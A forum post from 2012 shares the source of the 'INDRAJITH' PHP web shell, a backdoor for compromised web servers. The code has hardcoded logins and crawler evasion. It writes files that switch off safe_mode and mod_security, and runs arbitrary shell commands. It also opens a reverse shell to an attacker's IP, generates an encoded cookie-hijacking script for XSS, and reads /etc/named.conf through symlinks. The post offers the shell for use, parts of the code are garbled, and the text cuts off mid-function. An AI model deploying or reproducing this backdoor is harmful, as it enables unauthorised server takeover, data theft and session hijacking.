Active Members Fi8sVrs Posted December 27, 2012 Active Members Report Posted December 27, 2012 This is a mini-php backdoor shell.<?php/* * originally scripted by AJITH KP and VISHNUNATH KP*//*------------------ LOGIN -------------------*/$usernameame="ajithkp560";$password="ajithkp560";$email="ajithkp560@gmail.com";/*------------------ Login Data End ----------*/@error_reporting(5);/*------------------ Anti Crawler ------------*/if(!empty($_SERVER['HTTP_USER_AGENT'])){ $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; }}/*------------------ End of Anti Crawler -----*/ echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />"; echo "<style> html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; } #loginbox { font-size:11px; color:green; width:1000px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; } input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; } loginbox td { border-radius:5px; font-size:11px; } .header { size:25px; color:green; } h1 { font-family:DigifaceWide; color:green; font-size:200%; } h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; } .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;} .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; } hr { border:1px solid #222222; } #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; } #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; } #meunlist li { margin: 0px; padding: 0px; display: inline; } #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; } #meunlist a:hover { background: #222; color:green; border-left:1px solid green; border-right:1px solid green; } .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; } .menu { font-size:25px; color: } .textarea_edit { background-color:#111111; border:1px groove #333; color:#999; color:green; } .textarea_edit:onfocus { text-decoration:none; border:1px solid green; } .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;} #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;} .table{ width:100%; padding:4px 0; color:#888; font-size:15px; } .table a{ text-decoration:none; color:green; font-size:15px; } .table a:hover{text-decoration:underline;} .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; } .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; } .table tr:hover{ background:#181818; } .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; } .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; } .tbl a:hover{text-decoration:underline;} .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; } .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; } .tbl td:hover{ background:#181818; } #alert {position: relative;} #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;} #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;} #alert:target {display: none;} .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;} .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;} @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }} </style>"; if($_COOKIE["user"] != $usernameame && $_COOKIE["pass"] != md5($password)) { if($_POST["usrname"]==$usernameame && $_POST["passwrd"]==$password) { print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>'; } else { if($_POST['usrname']) { print'<script>alert("Sorry... Wrong UserName/PassWord");</script>'; } echo '<title>INDRAJITH SHELL</title><center> <div id=loginbox><p><font face="verdana,arial" size=-1> <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font> <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'> <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL</b></font></th></tr> <tr><td bgcolor="black" style="padding:5"> <form method="post"> <input type="hidden" name="action" value="login"> <input type="hidden" name="hide" value=""> <center><table> <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr> <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr> <tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table> </div><br /></center>'; exit; } }$color_g="green";$color_b="4C83AF";$color_bg="#111111";$color_hr="#222";$color_wri="green";$color_rea="yellow";$color_non="red";$path=$_GET['path'];@session_start();//@error_reporting(5);@set_time_limit(0);@ini_restore("safe_mode_include_dir");@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");@ini_restore("safe_mode");@ini_restore("open_basedir");$sep="/";if(strtolower(substr(PHP_OS,0,3))=="win"){ $os="win"; $sep="\\"; $ox="Windows";}else{ $os="nix"; $ox="Linux";}$self=$_SERVER['PHP_SELF'];$srvr_sof=$_SERVER['SERVER_SOFTWARE'];$your_ip=$_SERVER['REMOTE_ADDR'];$srvr_ip=$_SERVER['SERVER_ADDR'];$admin=$_SERVER['SERVER_ADMIN'];$s_php_ini="safe_mode=OFFdisable_functions=NONE";$ini_php="<?echo ini_get(\"safe_mode\");echo ini_get(\"open_basedir\");include(\$_GET[\"file\"]);ini_restore(\"safe_mode\");ini_restore(\"open_basedir\");echo ini_get(\"safe_mode\");echo ini_get(\"open_basedir\");include(\$_GET[\"ss\"]);?>";$s_htaccess="<IfModule mod_security.c>Sec------Engine OffSec------ScanPOST Off</IfModule>";$s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGIAddType application/x-httpd-cgi .shAddHandler cgi-script .plAddHandler cgi-script .pl";$sym_htaccess="Options allDirectoryIndex Sux.htmlAddType text/plain .phpAddHandler server-parsed .phpAddType text/plain .htmlAddHandler txt .htmlRequire NoneSatisfy Any";$sym_php_ini="safe_mode=OFFdisable_functions=NONE";$forbid_dir="Options -Indexes";$cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";/*----------------------- Top Menu ------------------------------------------*/if($safemode=="On"){ echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";}else{ echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";}echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";echo "<title>INDRAJITH SHELL</title><div id=result><table> <tbody> <tr> <td style='border-right:1px solid #104E8B;' width=\"300px;\"> <div style='text-align:center;'> <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font> </div> </td> <td> <div class=\"header\">OS</font> <font color=\"#666\" >:</font> ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br /> Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br /> MySQL <font color=\"#666\" > : </font>"; echo mysqlx(); echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx(); echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx(); echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx(); echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx(); echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size(); echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize(); echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a> <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />"; if($os == 'win'){ echo "Drives <font color=\"#666\" > : </font>";echo drivesx(); } echo " </div> </td> </tr> </tbody></table></div>";echo "<div class='menubar'> <div id=\"meunlist\"><ul><li><a href=\"?\">HOME</a></li><li><a href=\"?symlink\">SymLink</a></li><li><a href=\"?rs\">Reverse Shell</a></li><li><a href=\"?cookiejack\">Cookie HighJack</a></li><li><a href=\"?encodefile\">PHP Encode/Decode</a></li><li><a href=\"?path={$path}&safe_mod\">Safe Mode Fucker</a></li><li><a href=\"?path={$path}&forbd_dir\">Directory Listing Forbidden</a></li></ul><ul><li><a href=\"?massmailer\">Mass Mailer</a></li><li><a href=\"?cpanel_crack\">CPANEL Crack</a></li><li><a href=\"?server_exploit_details\">Exploit Details</a></li><li><a href=\"?remote_server_scan\">Remote Server Scanner</a></li><li><a href=\"?remotefiledown\">Remote File Downloader</a></li><li><a href=\"?hexenc\">Hexa Encode/Decode</a></li><li><a href=\"?killme\"><font color=red>Kill Me</font></a></li><li><a href=\"?about_us\">About us</a></li></ul></div></div>";/*----------------------- End of Top Menu -----------------------------------*//*--------------- FUNCTIONS ----------------*/function alert($alert_txt){ echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";}function disabled_functns(){ if(!@ini_get('disable_functions')) { echo "None"; } else { echo @ini_get('disable_functions'); }}function drivesx(){ foreach(range('A','Z') as $drive) { if(is_dir($drive.':\\')) { echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>"; } }}function filesizex($size){ if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; elseif ($size>=1024)$size = round(($size/1024),2)." KB"; else $size .= " B"; return $size;}function disc_size(){ echo filesizex(disk_total_space("/"));}function freesize(){ echo filesizex(disk_free_space("/"));}function file_perm($filz){ if($m=fileperms($filz)){ $p=''; $p .= ($m & 00400) ? 'r' : '-'; $p .= ($m & 00200) ? 'w' : '-'; $p .= ($m & 00100) ? 'x' : '-'; $p .= ($m & 00040) ? 'r' : '-'; $p .= ($m & 00020) ? 'w' : '-'; $p .= ($m & 00010) ? 'x' : '-'; $p .= ($m & 00004) ? 'r' : '-'; $p .= ($m & 00002) ? 'w' : '-'; $p .= ($m & 00001) ? 'x' : '-'; return $p; } else return "?????";}function mysqlx(){ if(function_exists('mysql_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } }function oraclesx(){ if(function_exists('oci_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; }}function mssqlx(){ if(function_exists('mssql_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } }function postgreyx(){ if(function_exists('pg_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } }function curlx(){ if(function_exists('curl_version')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } }function filesize_$filex){ $f_size=filesizex(filesize($filex)); return $f_size;}function rename_ui(){ $rf_path=$_GET['rename']; echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value=' >>> ' /></form></p><br /><br /><hr /><br /><br /></center></div>";}function filemanager_bg(){ global $sep, $self; $path=!empty($_GET['path'])?$_GET['path']:getcwd(); $dirs=array(); $fils=array(); if(is_dir($path)) { chdir($path); if($handle=opendir($path)) { while(($item=readdir($handle))!==FALSE) { if($item=="."){continue;} if($item==".."){continue;} if(is_dir($item)) { array_push($dirs, $path.$sep.$item); } else { array_push($fils, $path.$sep.$item); } } } else { alert("Access Denied for this operation"); } } else { alert("Directory Not Found!!!"); } echo "<div id=result><table class=table> <tr> <th width='500px'>Name</th> <th width='100px'>Size</th> <th width='100px'>Permissions</th> <th width='500px'>Actions</th> </tr>"; foreach($dirs as $dir) {//chdir(isset($_GET['path'])) echo "<tr><td><a href={$self}?path={$dir}>".basename($dir)."</a></td> <td>".filesize_$dir)."</td> <td><a href={$self}?path={$path}&perm={$dir}>".file_perm($dir)."</a></td> <td><a href={$self}?path={$path}&del_dir={$dir}>Delete</a> | <a href={$self}?path={$path}&rename={$dir}>Rename</a></td></tr>"; } foreach($fils as $fil) { echo "<tr><td><a href={$self}?path={$path}&read={$fil}>".basename($fil)."</a></td> <td>".filesize_$fil)."</td> <td><a href={$self}?path={$path}&perm={$fil}>".file_perm($fil)."</a></td> <td><a href={$self}?path={$path}&del_fil={$fil}>Delete</a> | <a href={$self}?path={$path}&rename={$fil}>Rename</a> | <a href={$self}?path={$path}&edit={$fil}>Edit</a> | <a href={$self}?path={$path}&down={$fil}>Download</a> | <a href={$self}?path={$path}©={$fil}>Copy</a> </td>"; } echo "</tr></table></div>";}function rename_bg(){ if(isset($_GET['old_name']) && isset($_GET['new_name'])) { $o_r_path=basename($_GET['old_name']); $r_path=str_replace($o_r_path, "", $_GET['old_name']); $r_new_name=$r_path.$_GET['new_name']; echo $r_new_name; if(rename($_GET['old_name'], $r_new_name)==FALSE) { alert("Access Denied for this action!!!"); } else { alert("Renamed File Succeessfully"); } }}function edit_file(){ $path=$_GET['path']; chdir($path); $edt_file=$_GET['edit']; $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file))); if($e_content) { $o_content=$e_content; } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) { $fd = fopen($edt_file, "rb"); if(!$fd) { alert("Permission Denied"); } else { while(!feof($fd)) { $o_content=wordwrap(htmlspecialchars(fgets($fd))); } } fclose($fd); } echo "<div id='result'><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>". basename($_GET['edit']) ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit']."> <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr /> <input class='input_big' name='save' type='submit' value=' Save ' /></div>";}function edit_file_bg(){ if(file_exists($_POST['e_file'])) { $handle = fopen($_POST['e_file'],"w+"); if (!handle) { alert("Permission Denied"); } else { fwrite($handle,$_POST['e_content_n']); alert("Your changes were Successfully Saved!"); } fclose($handle); } else { alert("File Not Found!!!"); }}function delete_file(){ $del_file=$_GET['del_fil']; if(unlink($del_file) != FALSE) { alert("Deleted Successfully"); exit; } else { alert("Access Denied for this Operation"); exit; }}function deldirs($d_dir){ $d_files= glob($d_dir.'*', GLOB_MARK); foreach($d_files as $d_file) { if(is_dir($d_file)) { deldirs($d_file); } else { unlink($d_file); } } if(is_dir($d_dir)) { if(rmdir($d_dir)) { alert("Deleted Directory Successfully"); } else { alert("Access Denied for this Operation"); } }}function download(){ $d_file=$_GET['down']; $d_name=basename($d_file); if (file_exists($d_file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='. basename($d_file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($d_file)); ob_clean(); readfile($d_file); exit; }}function code_viewer(){ $path=$_GET['path']; $r_file=$_GET['read']; $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file))); if($r_content) { $rr_content=$r_content; } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) { $fd = fopen($r_file, "rb"); if (!$fd) { alert("Permission Denied"); } else { while(!feof($fd)) { $rr_content=wordwrap(htmlspecialchars(fgets($fd))); } } fclose($fd); } echo "<div id=result><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&edit=".$_GET['read']."'>". basename($_GET['read']) ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre></div>";}function copy_file_ui(){ echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value=' >> ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";}function copy_file_bg(){ global $sep; if(function_exists(copy)) { if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name'])) { alert("Succeded"); } else { alert("Access Denied"); } }}function ch_perm_bg(){ if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) { if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE) { alert("Succeded. Permission Changed!!!"); } else { alert("Access Denied for This Operation"); } }}function ch_perm_ui(){ $p_file=$_GET['perm']; echo "<div id =result><center><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value=' >> ' /></form></p></center></div>"; ch_perm_bg();}function mk_file_ui(){ chdir($_GET['path']); echo "<div id=result><br /><br /><font color=red><form method='GET'> <input type='hidden' name='path' value=".getcwd()."> New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center> <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr /> <input class='input_big' type='submit' value=' Save ' /></form></center></div>";}function mk_file_bg(){ chdir($_GET['path']); $c_path=$_GET['path']; $c_file=$_GET['new_f_name']; $c_file_contents=$_GET['n_file_content']; $handle=fopen($c_file, "w"); if(!$handle) { alert("Permission Denied"); } else { fwrite($handle,$c_file_contents); alert("Your changes were Successfully Saved!"); } fclose($handle);}function create_dir(){ chdir($_GET['path']); $new_dir=$_GET['new_dir']; if(is_writable($_GET['path'])) { mkdir($new_dir); alert("Direcory Created Successfully"); exit; } else { alert("Access Denied for this Operation"); exit; }}function cmd($cmd){ chdir($_GET['path']); $res=""; if($_GET['cmdexe']) { $cmd=$_GET['cmdexe']; } if(function_exists('shell_exec')) { $res=shell_exec($cmd); } else if(function_exists('exec')) { exec($cmd,$res); $res=join("\n",$res); } else if(function_exists('system')) { ob_start(); system($cmd); $res = ob_get_contents(); ob_end_clean(); } elseif(function_exists('passthru')) { ob_start(); passthru($cmd); $res=ob_get_contents(); ob_end_clean(); } else if(function_exists('proc_open')) { $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $handle = proc_open($cmd ,$descriptorspec , $pipes); if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($pipes[1])) { $res .= fread($pipes[1], 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($pipes[1])) { $res .= fgets($pipes[1],512); } } } pclose($handle); } else if(function_exists('popen')) { $handle = popen($cmd , "r"); if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($handle)) { $res .= fread($handle, 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($handle)) { $res .= fgets($handle,512); } } } pclose($handle); } $res=wordwrap(htmlspecialchars($res)); if($_GET['cmdexe']) { echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>"; } return $res;}function upload_file(){ chdir($_POST['path']); if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name'])) { alert("Uploaded File Successfully"); } else { alert("Access Denied!!!"); }}function reverse_conn_ui(){ global $your_ip; echo "<div id='result'> <center><h2>Reverse Shell</h2><hr /> <br /><br /><form method='GET'><table class=tbl> <tr> <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'> <option>PHP Reverse Shell</option> </select></td></tr><tr> <td>Your IP : <input name='my_ip' value=".$your_ip."> PORT : <input name='my_port' value='560'> <input type='submit' value=' >> ' /></td></tr></form> <tr></tr> <tr><td><font color=red>PHP Reverse Shell</font>:<font color=green> nc -l -p <i>port</i></font></td></tr></table> </div>";}function reverse_conn_bg(){ global $os; $option=$_REQUEST['rev_option']; $ip=$_GET['my_ip']; $port=$_GET['my_port']; if($option=="PHP Reverse Shell") { echo "<div id=result><h2>RESULT</h2><hr /><br />"; function printit ($string) { if (!$daemon) { print "$string\n"; } } $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "<br /><br /><hr /><br /><br /></div>"; }}function cookie_jack(){ global $cookie_highjacker; echo "<div id=result><center><h2>NOTICE</h2><hr/>"; if(function_exists('fopen') && function_exists('fwrite')) { $cook=gzinflate(base64_decode($cookie_highjacker)); $han_le=fopen("jith_cookie.php", "w+"); if($han_le) { fwrite($han_le, $cook); echo "Yes... Cookie highjacker is generated.<br /> Name : <font color=green>jith_cookie.php</font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is useable in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. cheers...<br /><br /><hr /><br /><br /></center></div>"; } else { echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>"; } }}function safe_mode_fuck(){ global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php; $path = chdir($_GET['path']); chdir($_GET['path']); switch($_GET['safe_mode']) { case "s_php_ini": $s_file=$s_php_ini; $s_name="php.ini"; break; case "s_htaccess": $s_name=".htaccess"; $s_file=$s_htaccess; break; case "s_htaccess_pl": $s_name=".htaccess"; $s_file=$s_htaccess_pl; break; case "s_ini_php": $s_name="ini.php"; $s_file=$ini_php; } if(function_exists('fopen')&& function_exists('fwrite')) { $s_handle=fopen("$s_name", "a+"); if($s_handle) { fwrite($s_handle, $s_file); alert("Operation Succeed!!!"); } else { alert("Access Denied!!!"); } fclose($s_handle); }}function safe_mode_fuck_ui(){ global $path; $path=getcwd(); echo "<div id=result><br /><center><h2>Select Your Options</h2><hr /> <table class=tbl size=10><tr><td><a href=?path={$path}&safe_mode=s_php_ini>PHP.INI</a></td><td><a href=??path={$path}&safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=??path={$path}&safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";}function AccessDenied(){ global $path, $forbid_dir; $path=$_GET['path']; chdir($path); if(function_exists('fopen') && function_exists('fwrite')) { $forbid=fopen(".htaccess", "wb"); if($forbid) { fwrite($forbid, $forbid_dir); alert("Opreation Succeeded"); } else { alert("Access Denied"); } fclose($forbid); }}function sym_link(){ cmd('rm -rf AKP'); mkdir('AKP', 0777); $usrd = array(); $akps = @implode(@file("/etc/named.conf")); if(!$file) { echo("<div id=result><center><h2>Not Found</h2><hr /><font color=red>Sorry, bind file </font>( <font color=green>/etc/named.conf</font> )<font color=red> Not Found</font><br /><br /><hr /><br /><br 